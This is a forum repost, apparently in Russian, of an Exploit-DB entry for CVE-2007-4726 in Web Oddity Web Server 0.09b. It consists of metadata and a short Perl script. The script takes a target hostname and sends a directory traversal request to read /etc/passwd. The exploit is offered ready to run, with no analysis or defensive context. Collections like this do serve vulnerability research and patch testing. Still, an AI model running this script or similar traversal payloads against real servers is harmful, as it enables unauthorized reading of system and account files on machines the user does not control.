Exploit Web Oddity Web Server 0.09b - Directory Traversal

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4362
Проверка EDB
  1. Пройдено
Автор
KATATAFISH
Тип уязвимости
REMOTE
Платформа
LINUX
CVE
cve-2007-4726
Дата публикации
2007-09-04
Код:
# Web Oddity Web Server 0.09b Directory Transversal Vulnerability
# Found by: Katatafish ([email protected])
# Download: http://sourceforge.net/project/showfiles.php?group_id=13854
# Thanks: str0ke

use LWP::Simple;
use strict;

sub usage
{
       print "----------------------------------------------------- - -----------\n";
       print "Web Oddity Web Server 0.09b Directory Transversal Vulnerability\n";
       print "\n";
       print "usage: $0 www.site.com\n";
       print "------------------------------------------------- Katatafish-----\n";
       exit ();
}

my $host=shift || &usage;
getprint 'http://' . $host . '/../../../../../../../etc/passwd';

# milw0rm.com [2007-09-04]
 
Источник
www.exploit-db.com

Похожие темы